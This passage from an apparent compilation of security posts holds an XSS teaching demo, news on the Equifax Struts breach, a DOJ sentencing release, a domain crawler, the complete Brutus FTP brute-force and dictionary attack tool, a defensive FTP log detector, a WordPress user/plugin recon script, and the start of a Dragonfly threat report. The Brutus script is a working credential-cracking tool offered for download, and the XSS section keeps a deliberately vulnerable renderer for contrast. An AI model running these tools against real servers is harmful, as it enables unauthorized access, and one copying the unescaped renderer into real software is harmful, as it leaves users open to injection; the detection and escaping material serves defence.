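from html.parser import HTMLParser


def render_vulnerable(name):
    """Concatenates user input into markup; input becomes code."""
    return ('<p>Hello, ' + name + '</p>\n'
            '<input type="text" name="name" value="' + name + '">')


def render_truncated(name, limit=30):
    """Scenario 2 of the paper: a length restriction is not a control,
    a short payload still injects."""
    return render_vulnerable(name[:limit])


def render_escaped(name):
    """Output encoding: with quote=True, &, <, >, " and ' are all encoded,
    which covers the text context and the quoted-attribute context alike."""
    safe = html.escape(name, quote=True)
    return ('<p>Hello, ' + safe + '</p>\n'
            '<input type="text" name="name" value="' + safe + '">')


class _Audit(HTMLParser):
    """Records the tag sequence a browser would see and the parsed value of
    the input element; injection shows up as extra tags or a broken value."""
    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_value = dict(attrs).get("value")

    def handle_endtag(self, tag):
        self.tags.append("/" + tag)


TEMPLATE_TAGS = ["p", "/p", "input"]  # what the template emits on its own


def audit(rendered):
    """Return (tag sequence, value attribute) as a parser sees the page."""
    a = _Audit()
    a.feed(rendered)
    a.close()
    return a.tags, a.input_value


def is_injected(rendered):
    """True when the page grew tags beyond the template's own."""
    return audit(rendered)[0] != TEMPLATE_TAGS


# Constructed payload: closes the value attribute and opens a new element.
PAYLOAD = '"><b>injected</b>'

if __name__ == "__main__":
    for fn in (render_vulnerable, render_truncated, render_escaped):
        print(fn.__name__, "injected" if is_injected(fn(PAYLOAD)) else "clean")
```

The audit also shows why the attribute context matters: with escaping, the parser hands back the value attribute exactly equal to the submitted string, whereas the vulnerable renderer yields an empty value and two stray tags. Escaping at output time is the control the paper arrives at; input sanitization is a second layer, not a replacement.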
8. A sample of code used by lgtm to detect the vulnerability (lgtm)

Correction: An earlier version of this article said the vulnerability exploited by the hackers who broke into Equifax was the one disclosed on Sep. 4. It’s possible that the vulnerability that was targeted was one disclosed in March. We will update this post when we’ve confirmed which vulnerability it was.

The credit reporting agency Equifax announced on Sept. 7 that hackers stole records containing personal information on up to 143 million American consumers. The hackers behind the attack, the company said, “exploited a U.S. website application vulnerability to gain access to certain files.”

That vulnerability, according to a report on the data breach by William Baird & Co., was in a popular open-source software package called Apache Struts, which is a programming framework for building web applications in Java. Two vulnerabilities in Struts have been discovered so far in 2017. One was announced in March, and another was announced earlier this week on Sept. 4. At the moment, it’s unclear which vulnerability the Baird report was referring to.

As we reported earlier this week, the vulnerability announced on Sept. 4 has existed in Struts since 2008. In their report on lgtm.com, the security researchers who discovered the bug warned that the affected application is widely used across industries and can easily be hacked with nothing but a browser, an internet connection, and some information about how the bug works.

“At least 65% of the Fortune 100 companies are actively using web applications built with the Struts framework,” the report said. “Organizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader’s Digest, Office Depot, and SHOWTIME are known to have developed applications using the framework. This illustrates how widespread the risk is.”

The bug specifically affects a popular plugin called REST, which developers use to handle web requests, like data sent to a server from a form a user has filled out. The vulnerability relates to how Struts parses that kind of data and converts it into information that can be interpreted by the Java programming language. When the vulnerability is successfully exploited, malicious code can be hidden inside of such data, and executed when Struts attempts to convert it. That means intruders could easily inject malware into web servers, possibly without being detected, and use it to steal or delete sensitive data, or infect computers with ransomware, among other things.

“Organizations who use Struts should upgrade their components immediately,” said Man Yue Mo, a researcher at lgtm.com.

The researchers said in their report that they had developed a “simple working exploit for this vulnerability,” which they have not yet published so that affected users can have a chance to update their software to the latest version, which has fixed the bug. The researchers also said they had found no evidence of an exploit being circulated online, on black market websites, or elsewhere. “At the time of the announcement there is no suggestion that an exploit is publicly available, but it is likely that there will be one soon,” the researchers said in their report.

Equifax said in its Sept. 7 statement that most of the consumer information accessed includes “names, Social Security numbers, birth dates, addresses, and in some instances, driver’s license numbers” as well as “credit card numbers for approximately 209,000 consumers.” The company added that 182,000 credit-dispute documents, which contain personal information, were also stolen.

Via https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/
9. ALEXANDRIA, Va. – A North Carolina man who conspired with others to gain unauthorized access to government computer systems and online accounts belonging to several United States government officials was sentenced today to 5 years in prison.

Justin G. Liverman, aka “D3F4ULT”, 25, of Morehead City, pleaded guilty on January 6. Liverman admitted to being a member of a conspiracy that called itself “Crackas With Attitude” to commit unauthorized computer intrusions, identity theft, and telephone harassment.

According to the statement of facts filed with the plea agreement, beginning in November 2015, Liverman conspired to attempt to intimidate and harass U.S. officials and their families by gaining unauthorized access to victims’ online accounts, among other things. For example, Liverman publicly posted online documents and personal information unlawfully obtained from a victim’s personal account; sent threatening text messages to the same victim’s cellphone; and paid an unlawful “phonebombing” service to call the victim repeatedly with a threatening message. In November 2015, the conspiracy used that victim's government credentials to gain unlawful access to a confidential federal law enforcement database, where Liverman obtained information relating to dozens of law enforcement officers and uploaded this information to a public website. In total, the conspiracy targeted more than 10 victims and caused more than $1.5 million in losses to victims.

A co-conspirator, Andrew Otto Boggs, 23, of North Wilkesboro, was sentenced on June 30 to two years in prison. Other members of the conspiracy are located in the United Kingdom and are being prosecuted by the Crown Prosecution Service.

Dana J. Boente, U.S. Attorney for the Eastern District of Virginia, Andrew W. Vale, Assistant Director in Charge of the FBI’s Washington Field Office, and Brian J. Ebert, Special Agent in Charge of the U.S. Secret Service’s Washington Field Office, made the announcement after sentencing by U.S. District Judge Gerald Bruce Lee. Assistant U.S. Attorneys Maya D. Song and Jay V. Prabhu, and Special Assistant U.S. Attorney Joseph V. Longobardo prosecuted the case. The U.S. Attorney’s Offices for the Eastern and Western Districts of North Carolina, and the FBI’s Charlotte Division provided significant assistance with the investigation.

A copy of this press release is located on the website of the U.S. Attorney’s Office for the Eastern District of Virginia. Related court documents and information are located on the website of the District Court for the Eastern District of Virginia or on PACER by searching for Case No. 1:16-cr-313.

Source: https://www.justice.gov/usao-edva/pr/man-sentenced-5-years-hacking-conspiracy-targeted-senior-us-government-officials
10. dcrawl is a simple, but smart, multi-threaded web crawler for randomly gathering huge lists of unique domain names.

How it works?

dcrawl takes one site URL as input and detects all <a href=...> links in the site's body. Each found link is put into the queue. Successively, each queued link is crawled in the same way, branching out to more URLs found in links on each site's body.

How smart crawling works:
- Branching out only to a predefined number of links found per one hostname.
- Maximum number of allowed different hostnames per one domain (avoids subdomain crawling hell, e.g. blogspot.com).
- Can be restarted with the same list of domains - last saved domains are added to the URL queue.
- Crawls only sites that return text/html Content-Type in the HEAD response.
- Retrieves site body of maximum 1MB size.
- Does not save inaccessible domains.

How to run?

go build dcrawl.go
./dcrawl -url http://wired.com -out ~/domain_lists/domains1.txt -t 8

Usage

 ___                          __
 __| _/________________ __ _ _| |
 / __ |/ ___\_ __ \__ \\ \/ \/ / |
/ /_/ \ \___| | \// __ \\ /| |__
\____ |\___ >__| (____ /\/\_/ |____/
 \/ \/ \/ v.1.0

usage: dcrawl -url URL -out OUTPUT_FILE -t THREADS

  -ms int
        maximum different subdomains for one domain (def. 10) (default 10)
  -mu int
        maximum number of links to spider per hostname (def. 5) (default 5)
  -out string
        output file to save hostnames to
  -t int
        number of concurrent threads (def. 8) (default 8)
  -url string
        URL to start scraping from
  -v bool
        verbose (default false)

Mirror:

package main

import (
	"bufio"
	"flag"
	"fmt"
	"io"
	"io/ioutil"
	"net"
	"net/http"
	"net/url"
	"os"
	"regexp"
	"strings"
	"time"

	"golang.org/x/net/publicsuffix"
)

const Version = "1.0"
const BodyLimit = 1024 * 1024
const MaxQueuedUrls = 4096
const MaxVisitedUrls = 8192
const UserAgent = "dcrawl/1.0"

var http_client *http.Client

var (
	start_url           = flag.String("url", "", "URL to start scraping from")
	output_file         = flag.String("out", "", "output file to save hostnames to")
	max_threads         = flag.Int("t", 8, "number of concurrent threads (def. 8)")
	max_urls_per_domain = flag.Int("mu", 5, "maximum number of links to spider per hostname (def. 5)")
	max_subdomains      = flag.Int("ms", 10, "maximum different subdomains for one domain (def. 10)")
	verbose             = flag.Bool("v", false, "verbose (def. false)")
)

// ParsedUrl carries a crawled URL ("" when the fetch failed) and the links found in it.
type ParsedUrl struct {
	u    string
	urls []string
}

func stringInArray(s string, sa []string) bool {
	for _, x := range sa {
		if x == s {
			return true
		}
	}
	return false
}

// get_html issues a HEAD request first, only fetching the body when the
// server answers 200 with a text/html Content-Type, and reads at most 1MB.
func get_html(u string) ([]byte, error) {
	req, err := http.NewRequest("HEAD", u, nil)
	if err != nil {
		return nil, err
	}
	req.Header.Set("User-Agent", UserAgent)
	resp, err := http_client.Do(req)
	if err != nil {
		return nil, err
	}
	resp.Body.Close() // fix: release the HEAD response before the GET
	if resp.StatusCode != http.StatusOK {
		return nil, fmt.Errorf("HTTP response %d", resp.StatusCode)
	}
	if _, ct_ok := resp.Header["Content-Type"]; ct_ok {
		ctypes := strings.Split(resp.Header["Content-Type"][0], ";")
		if !stringInArray("text/html", ctypes) {
			return nil, fmt.Errorf("URL is not 'text/html'")
		}
	}
	req.Method = "GET"
	resp, err = http_client.Do(req)
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()
	b, err := ioutil.ReadAll(io.LimitReader(resp.Body, BodyLimit)) // limit response reading to 1MB
	if err != nil {
		return nil, err
	}
	return b, nil
}

// find_all_urls extracts href targets from anchor tags, keeping absolute
// ftp/http/https URLs and resolving root-relative ones against the page URL.
func find_all_urls(u string, b []byte) []string {
	r, _ := regexp.Compile(`<a\s+(?:[^>]*?\s+)?href=["\']([^"\']*)`)
	urls := r.FindAllSubmatch(b, -1)
	var rurls []string
	ru, _ := regexp.Compile(`^(?:ftp|http|https):\/\/(?:[\w\.\-\+]+:{0,1}[\w\.\-\+]*@)?(?:[a-z0-9\-\.]+)(?::[0-9]+)?(?:\/|\/(?:[\w#!:\.\?\+=&%@!\-\/\(\)]+)|\?(?:[\w#!:\.\?\+=&%@!\-\/\(\)]+))?$`)
	for _, ua := range urls {
		if ru.Match(ua[1]) {
			rurls = append(rurls, string(ua[1]))
		} else if len(ua) > 0 && len(ua[1]) > 0 && ua[1][0] == '/' {
			up, err := url.Parse(u)
			if err == nil {
				ur := up.Scheme + "://" + up.Host + string(ua[1])
				if ru.MatchString(ur) {
					rurls = append(rurls, ur)
				}
			}
		}
	}
	return rurls
}

func grab_site_urls(u string) ([]string, error) {
	var ret []string
	b, err := get_html(u)
	if err == nil {
		ret = find_all_urls(u, b)
	}
	return ret, err
}

// process_urls is the worker loop: each goroutine takes URLs from in and
// reports the links it found on out.
func process_urls(in <-chan string, out chan<- ParsedUrl) {
	for {
		var u string = <-in
		if *verbose {
			fmt.Printf("[->] %s\n", u)
		}
		urls, err := grab_site_urls(u)
		if err != nil {
			u = ""
		}
		out <- ParsedUrl{u, urls}
	}
}

func is_blacklisted(u string) bool {
	var blhosts []string = []string{
		"google.com", ".google.", "facebook.com", "twitter.com", ".gov",
		"youtube.com", "wikipedia.org", "wikisource.org", "wikibooks.org",
		"deviantart.com", "wiktionary.org", "wikiquote.org", "wikiversity.org",
		"wikia.com", "blogspot.", "wordpress.com", "tumblr.com", "about.com",
	}
	for _, bl := range blhosts {
		if strings.Contains(u, bl) {
			return true
		}
	}
	return false
}

func create_http_client() *http.Client {
	var transport = &http.Transport{
		Dial: (&net.Dialer{
			Timeout: 10 * time.Second,
		}).Dial,
		TLSHandshakeTimeout: 5 * time.Second,
		DisableKeepAlives:   true,
	}
	client := &http.Client{
		Timeout:   time.Second * 10,
		Transport: transport,
	}
	return client
}

func banner() {
	fmt.Println(` ___                          __ `)
	fmt.Println(` __| _/________________ __ _ _| | `)
	fmt.Println(` / __ |/ ___\_ __ \__ \\ \/ \/ / | `)
	fmt.Println(`/ /_/ \ \___| | \// __ \\ /| |__`)
	fmt.Println(`\____ |\___ >__| (____ /\/\_/ |____/`)
	fmt.Println(` \/ \/ \/ v.` + Version)
	fmt.Println("")
}

func usage() {
	fmt.Printf("usage: dcrawl -url URL -out OUTPUT_FILE\n\n")
}

func init() {
	http_client = create_http_client()
}

func main() {
	banner()
	flag.Parse()
	if *start_url == "" || *output_file == "" {
		usage()
		return
	}
	fmt.Printf("[*] output file: %s\n", *output_file)
	fmt.Printf("[*] start URL: %s\n", *start_url)
	fmt.Printf("[*] max threads: %d\n", *max_threads)
	fmt.Printf("[*] max links: %d\n", *max_urls_per_domain)
	fmt.Printf("[*] max subd: %d\n", *max_subdomains)
	fmt.Printf("\n")

	vurls := make(map[string]bool)   // visited URLs
	chosts := make(map[string]int)   // links queued per hostname
	dhosts := make(map[string]bool)  // hostnames already saved
	ldhosts := make(map[string]int)  // hostnames seen per eTLD+1
	var qurls []string
	var thosts []string

	// fix: O_APPEND alone opens the file read-only; the writer below needs O_RDWR
	fo, err := os.OpenFile(*output_file, os.O_RDWR|os.O_APPEND, 0666)
	if os.IsNotExist(err) {
		fo, err = os.Create(*output_file)
	}
	if err != nil {
		fmt.Fprintf(os.Stderr, "ERROR: can't open or create file '%s'", *output_file)
		return
	}
	defer fo.Close()

	// reload previously saved hostnames so a restart does not duplicate them
	scanner := bufio.NewScanner(fo)
	nd := 0
	for scanner.Scan() {
		hn := scanner.Text()
		if hd, err := publicsuffix.EffectiveTLDPlusOne(hn); err == nil {
			ldhosts[hd] += 1
		}
		dhosts[hn] = true
		thosts = append(thosts, hn)
		nd++
	}
	fmt.Printf("[+] loaded %d domains\n\n", nd)
	w := bufio.NewWriter(fo)

	su := *start_url
	in_url := make(chan string)
	out_urls := make(chan ParsedUrl)
	for x := 0; x < *max_threads; x++ {
		go process_urls(in_url, out_urls)
	}
	tu := 1

	ups, err := url.Parse(su)
	if err != nil {
		fmt.Fprintf(os.Stderr, "[-] ERROR: invalid start URL: %s\n", su)
		return
	}
	if _, sd_ok := dhosts[ups.Host]; sd_ok {
		fmt.Printf("[*] start URL detected in saved domains\n")
		fmt.Printf("[*] using last %d saved domains for crawling\n", *max_threads)
		n := *max_threads
		if n > len(thosts) {
			n = len(thosts) // fix: fewer saved domains than threads; use them all
		}
		for _, d := range thosts[len(thosts)-n:] {
			fmt.Printf("[+] adding: %s\n", ("http://" + d))
			qurls = append(qurls, ("http://" + d))
		}
		in_url <- qurls[0]
	} else {
		in_url <- su
	}

	for {
		var purl ParsedUrl = <-out_urls
		tu -= 1
		if purl.u != "" {
			if du, err := url.Parse(purl.u); err == nil {
				if _, d_ok := dhosts[du.Host]; !d_ok {
					fmt.Printf("[%d] %s\n", len(dhosts), du.Host)
					dhosts[du.Host] = true
					fmt.Fprintf(w, "%s\n", du.Host)
					w.Flush()
				}
			}
		}
		urls := purl.urls
		for _, u := range urls {
			// strip # out of url if exists
			u = strings.Split(u, "#")[0]
			up, err := url.Parse(u)
			if err == nil {
				h := up.Host
				hd := ""
				d_ok := true
				if hd, err = publicsuffix.EffectiveTLDPlusOne(h); err == nil {
					if n, ok := ldhosts[hd]; ok {
						if n >= *max_subdomains {
							d_ok = false
						}
					}
				}
				_, is_v := vurls[u]
				if !is_blacklisted(u) && chosts[h] < *max_urls_per_domain && !is_v && d_ok && len(qurls) < MaxQueuedUrls {
					vurls[u] = true
					chosts[h] += 1
					if hd != "" {
						ldhosts[hd] += 1
					}
					qurls = append(qurls, u)
				}
			}
		}
		if len(qurls) == 0 {
			fmt.Fprintf(os.Stderr, "ERROR: ran out of queued urls!\n")
			return
		}
		// push more urls to channel
		for tu < *max_threads && len(qurls) > 0 {
			u := qurls[0]
			qurls = append(qurls[:0], qurls[1:]...)
			in_url <- u
			tu++
		}
		if len(vurls) >= MaxVisitedUrls {
			vurls = make(map[string]bool)
		}
	}
}

License

dcrawl was made by Kuba Gretzky from breakdev.org and released under the MIT license.

Download dcrawl-master.zip

Source
  11. done.
12. Brutus is a small threaded python FTP brute-force and dictionary attack tool. It supports several brute-force parameters such as custom character sets, password length, minimum password length, prefix, and postfix strings to passwords generated.

Download brutus-0.3.py

Usage:

usage: brutus.py [-h] [-w WORDLIST] [-c CHARSET] [-l [LENGTH]] [-m [MINLENGTH]]
                 [-r PREFIX] [-o POSTFIX] [-p [PAUSE]] [-t [THREADS]]
                 [-v [VERBOSE]]
                 host username

positional arguments:
  host                  FTP host
  username              username to crack

optional arguments:
  -h, --help            show this help message and exit
  -w WORDLIST, --wordlist WORDLIST
                        wordlist of passwords
  -c CHARSET, --charset CHARSET
                        character set for brute-force
  -l [LENGTH], --length [LENGTH]
                        password length for brute-force
  -m [MINLENGTH], --minlength [MINLENGTH]
                        Minimum password length
  -r PREFIX, --prefix PREFIX
                        prefix each password for brute-force
  -o POSTFIX, --postfix POSTFIX
                        postfix each password for brute-force
  -p [PAUSE], --pause [PAUSE]
                        pause time between launching threads
  -t [THREADS], --threads [THREADS]
                        num of threads
  -v [VERBOSE], --verbose [VERBOSE]
                        verbose output

Mirror:

################################################################################
# tool: Brutus - FTP Brute-Force/Dictionary Attack Tool
# version: 0.3
# email: mrh@bushisecurity.com
# www: bushisecurity.com/brutus/
################################################################################
# MIT License
# Copyright (c) 2017 Phillip Aaron
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
################################################################################

import argparse, sys, threading, time
from datetime import datetime
from itertools import chain, product
from ftplib import FTP

# Create some global variables
class glob:
    pwd = False        # Used for stopping attack when password found
    chrset = ""        # Character set for brute-force
    prefix = ""        # Prefix string
    postfix = ""       # Postfix string
    length = 8         # Default length of password
    minlength = 5      # Default min length of password
    thrds = 10         # Default num of threads
    verb = False       # Default value for verbose output
    pause = 0.01       # Default throttle time, 1 = one second
    cnt = 0            # Counting number of attempts

# Iterable Method for brute-forcing a character set and length
def bruteforce(charset, maxlength, minlength):
    return (''.join(candidate) for candidate in chain.from_iterable(
        product(charset, repeat=i) for i in range(minlength, maxlength + 1)))

# Method for making ftp connections
def crack(host, user, pwd):
    try:
        if glob.verb:  # Check for verbose output
            print "[" + str(glob.cnt) + "] Trying: " + pwd.strip()
        ftp = FTP(host)  # Create FTP object
        if ftp.login(user, pwd):  # Check if true
            print "\nPassword for " + user + ": " + pwd.strip()
            print "=================================================="
            glob.pwd = True  # Set global value
            print ftp.dir()  # Display contents of root FTP
            ftp.quit()  # Disconnect from FTP
    except Exception as err:
        pass  # Ignore errors

# Method wait for threads to complete
def wait(threads):
    for thread in threads:
        thread.join()

# Method for staging attack
def main(args):
    try:
        start = datetime.now()  # Time attack started
        print "\nAttacking FTP user [" + args.username + "] at [" + args.host + "]"
        print "=================================================="
        thrdCnt = 0; threads = []  # Local variables
        # Set global variables
        if args.pause: glob.pause = float(args.pause)
        if args.verbose: glob.verb = True
        if args.threads: glob.thrds = int(args.threads)
        if args.length: glob.length = int(args.length)
        if args.minlength: glob.minlength = int(args.minlength)
        if args.charset: glob.chrset = args.charset
        if args.prefix: glob.prefix = args.prefix
        if args.postfix: glob.postfix = args.postfix
        if args.charset == None:  # Create charset from printable ascii range
            for char in range(37, 127): glob.chrset += chr(char)
        # Brute force attack
        if args.wordlist == None:
            for pwd in bruteforce(glob.chrset, int(glob.length), int(glob.minlength)):  # Launch brute-force
                if glob.pwd: break  # Stop if password found
                if thrdCnt != args.threads:  # Create threads until args.threads
                    if args.prefix: pwd = str(args.prefix) + pwd
                    if args.postfix: pwd += str(args.postfix)
                    thread = threading.Thread(target=crack, args=(args.host, args.username, pwd,))
                    thread.start()
                    threads.append(thread)
                    thrdCnt += 1; glob.cnt += 1
                    time.sleep(glob.pause)  # Set pause time
                else:  # Wait for threads to complete
                    wait(threads)
                    thrdCnt = 0
                    threads = []
        # Dictionary attack
        else:
            with open(args.wordlist) as fle:  # Open wordlist
                for pwd in fle:  # Loop through passwords
                    if glob.pwd: break  # Stop if password found
                    if thrdCnt != args.threads:  # Create threads until args.threads
                        thread = threading.Thread(target=crack, args=(args.host, args.username, pwd,))
                        thread.start()
                        threads.append(thread)
                        thrdCnt += 1; glob.cnt += 1
                        time.sleep(glob.pause)  # Set pause time
                    else:
                        wait(threads)  # Wait for threads to complete
                        thrdCnt = 0
                        threads = []
    except KeyboardInterrupt:
        print "\nUser Cancelled Attack, stopping remaining threads....."
        wait(threads)  # Wait for threads to complete
        sys.exit(0)  # Kill app
    wait(threads)  # Wait for threads to complete
    stop = datetime.now()
    print "=================================================="
    print "Attack Duration: " + str(stop - start)
    print "Attempts: " + str(glob.cnt) + "\n"

if __name__ == "__main__":
    # Declare an argparse variable to handle application command line arguments
    parser = argparse.ArgumentParser()
    parser.add_argument("host", action="store", help="FTP host")
    parser.add_argument("username", action="store", help="username to crack")
    parser.add_argument("-w", "--wordlist", action="store", help="wordlist of passwords")
    parser.add_argument("-c", "--charset", action="store", help="character set for brute-force")
    parser.add_argument("-l", "--length", action="store", help="password length for brute-force", nargs='?', default=8, const=8, type=int)
    parser.add_argument("-m", "--minlength", action="store", nargs='?', default=1, const=1, help="Minimum password length", type=int)
    parser.add_argument("-r", "--prefix", action="store", help="prefix each password for brute-force")
    parser.add_argument("-o", "--postfix", action="store", help="postfix each password for brute-force")
    parser.add_argument("-p", "--pause", action="store", help="pause time between launching threads", nargs='?', default=0.01, const=0.01)
    parser.add_argument("-t", "--threads", action="store", help="num of threads", nargs='?', default=10, const=10, type=int)
    parser.add_argument("-v", "--verbose", action="store", help="verbose output", nargs='?', default=False, const=True)
    # Show help if required arg not included
    if len(sys.argv[1:]) == 0:
        parser.print_help()
        parser.exit()
    args = parser.parse_args()
    if args.minlength != None or args.length != None:
        if args.minlength > args.length:
            print "\n** Argument Logic Error **"
            print "Minimum password length [-m " + str(args.minlength) + "] is greater than Password length [-l " + str(args.length) + "]\n"
            parser.print_help()
            parser.exit()
    main(args)

Source
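From the server side, a tool like the one above leaves an unmistakable trace: many failed logins for one account from one client in a short window, and, if it succeeds, a successful login right after them. The following is an added example, not part of the Brutus post: a small detector over FTP daemon log lines that raises one alert when a client crosses a failure threshold inside a sliding window and a second, higher-priority alert when that same client then logs in. The log lines are constructed in vsftpd's log format, the addresses are from the RFC 5737 documentation ranges, and the threshold and window are assumed defaults to tune for your environment.

```python
"""Detect password-guessing against an FTP service from its log.
Added example, not part of the Brutus post; log lines are constructed in
vsftpd's format with RFC 5737 documentation addresses."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# vsftpd login lines: <ctime> [pid N] [user] OK|FAIL LOGIN: Client "ip"
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')


def parse(line):
    """Return (timestamp, user, result, ip) for a login line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(re.sub(r" +", " ", m["ts"]), "%a %b %d %H:%M:%S %Y")
    return ts, m["user"], m["result"], m["ip"]


def detect(lines, threshold=5, window=timedelta(seconds=60)):
    """Return alerts as (ip, kind, detail).
    'bruteforce': an IP accumulates >= threshold failures inside the window
    (raised once per IP); 'success-after-failures': an IP that still has
    >= threshold recent failures then logs in successfully."""
    alerts = []
    recent = defaultdict(deque)  # ip -> timestamps of failures in the window
    flagged = set()
    for line in lines:
        rec = parse(line)
        if rec is None:  # CONNECT lines and anything else are skipped
            continue
        ts, user, result, ip = rec
        q = recent[ip]
        while q and ts - q[0] > window:  # slide the window forward
            q.popleft()
        if result == "FAIL":
            q.append(ts)
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append((ip, "bruteforce",
                               "%d failed logins for '%s' within %ds"
                               % (len(q), user, window.total_seconds())))
        elif len(q) >= threshold:
            alerts.append((ip, "success-after-failures",
                           "'%s' logged in after %d failures" % (user, len(q))))
    return alerts


# Constructed sample: one guessing client that eventually gets in, and one
# user who mistypes twice over a longer span and then logs in normally.
SAMPLE_LOG = """\
Tue Sep 12 21:02:10 2017 [pid 1201] CONNECT: Client "198.51.100.7"
Tue Sep 12 21:02:11 2017 [pid 1201] [ftpuser] FAIL LOGIN: Client "198.51.100.7"
Tue Sep 12 21:02:12 2017 [pid 1203] [ftpuser] FAIL LOGIN: Client "198.51.100.7"
Tue Sep 12 21:02:13 2017 [pid 1205] [ftpuser] FAIL LOGIN: Client "198.51.100.7"
Tue Sep 12 21:02:14 2017 [pid 1207] [ftpuser] FAIL LOGIN: Client "198.51.100.7"
Tue Sep 12 21:02:15 2017 [pid 1209] [ftpuser] FAIL LOGIN: Client "198.51.100.7"
Tue Sep 12 21:02:16 2017 [pid 1211] [ftpuser] FAIL LOGIN: Client "198.51.100.7"
Tue Sep 12 21:02:20 2017 [pid 1213] [ftpuser] OK LOGIN: Client "198.51.100.7"
Tue Sep 12 21:02:30 2017 [pid 1300] [alice] FAIL LOGIN: Client "192.0.2.9"
Tue Sep 12 21:04:00 2017 [pid 1302] [alice] FAIL LOGIN: Client "192.0.2.9"
Tue Sep 12 21:04:05 2017 [pid 1304] [alice] OK LOGIN: Client "192.0.2.9"
"""
SAMPLE_LINES = SAMPLE_LOG.splitlines()

if __name__ == "__main__":
    for ip, kind, detail in detect(SAMPLE_LINES):
        print(ip, kind, detail)
```

Keying on the client address alone misses distributed guessing, so in practice the same window is also kept per target account; the `-p` pause in the tool above shows why the window has to be wide enough to catch deliberately slowed attempts.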
13. ╔═══════════════════════════ ஜ۩☆۩ஜ ══════════════════════════╗
WP Grab Info v2
╚═══════════════════════════ ஜ۩☆۩ஜ ══════════════════════════╝

Features:
- Detect User
- Detect Version
- Detect Theme
- Detect Plugins

Usage:
perl WP-Grab.pl -u http://website.com/

#!/usr/bin/perl
#WordPress Grab Info
#Coded By Mohamed Riahi 08/20/2017
#don't Change my Fucking Rights
#[Detect User]
#[Detect Version]
#[Detect Theme]
#[Detect Plugins]

use LWP::UserAgent;
use Term::ANSIColor;
use HTTP::Request::Common qw(GET);
use URI::URL;
use Getopt::Long;

$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
$ua->timeout(10);

GetOptions(
    "u=s" => \$site,
);

unless ($site) {
    help();
}
if ($site) {
    banner();
}

sub banner() {
    print q(
____ , /---.'.__ ____// '--.\ /.---' _______ \\ // /.------.\ \| .'/ ______ // ___ \ \ ||/|\ // _/_----.\__ |/ /.-.\ \ \:|< >|// _/.'..\ '--' // \'. | \'.|.'/ /_/ / \\ // \ \_\/" ' ~\-'.-' \\ // '-._| :H: |'-.__ \\ // {/'==='\}'-._\ || || \\ \| || \\ ' |/ \\ || WP Grab Info v2 || Coded BY Mohamed Riahi \\ '
    );
    print " [+] $site\n";
    user();
    Version();
    Theme();
    Plugin();
}

sub help() {
    print " Usage: perl WP-Grab.pl -u http://website.com/";
}

#################### GET USER ####################
sub user() {
    $user = $site . '/?author=1';
    $getuser = $ua->get($user)->content;
    if ($getuser =~ /author\/(.*?)\//) {
        print " [-] User: $1\n";
    } else {
        print " [-] Can't Get Username\n";
    }
}

#################### GET VERSION ####################
sub Version() {
    $getversion = $ua->get($site)->content;
    if ($getversion =~ /content="WordPress (.*?)"/) {
        print " [-] Version: $1\n";
    } else {
        print " [-] Can't Get Version\n";
    }
}

#################### GET THEME ####################
sub Theme() {
    $getheme = $ua->get($site)->content;
    if ($getheme =~ /\/themes\/(.*?)\//) {
        print " [-] Theme: $1\n";
    } else {
        print " [-] Can't Get Theme\n";
    }
}

#################### GET PLUGINs ####################
sub Plugin() {
    $getplugin = $ua->get($site)->content;
    my %seen;
    while ($getplugin =~ m/\/wp-content\/plugins\/(.*?)\//g) {
        $plu = $1;
        next if $seen{$plu}++;  # already seen
        print " [-] Plugin: $plu \n";
    }
}

Download mirror: WP-Grab-Info-master.zip
Source: https://github.com/Moham3dRiahi/WP-Grab-Info
14. Resurgence in energy sector attacks, with the potential for sabotage, linked to re-emergence of Dragonfly cyber espionage group

The energy sector in Europe and North America is being targeted by a new wave of cyber attacks that could provide attackers with the means to severely disrupt affected operations. The group behind these attacks is known as Dragonfly. The group has been in operation since at least 2011 but has re-emerged over the past two years from a quiet period following exposure by Symantec and a number of other researchers in 2014. This “Dragonfly 2.0” campaign, which appears to have begun in late 2015, shares tactics and tools used in earlier campaigns by the group.

The energy sector has become an area of increased interest to cyber attackers over the past two years. Most notably, disruptions to Ukraine’s power system in 2015 and 2016 were attributed to a cyber attack and led to power outages affecting hundreds of thousands of people. In recent months, there have also been media reports of attempted attacks on the electricity grids in some European countries, as well as reports of companies that manage nuclear facilities in the U.S. being compromised by hackers.

The Dragonfly group appears to be interested in both learning how energy facilities operate and also gaining access to operational systems themselves, to the extent that the group now potentially has the ability to sabotage or gain control of these systems should it decide to do so. Symantec customers are protected against the activities of the Dragonfly group.

Figure 1. An outline of the Dragonfly group's activities in its most recent campaign

Dragonfly 2.0

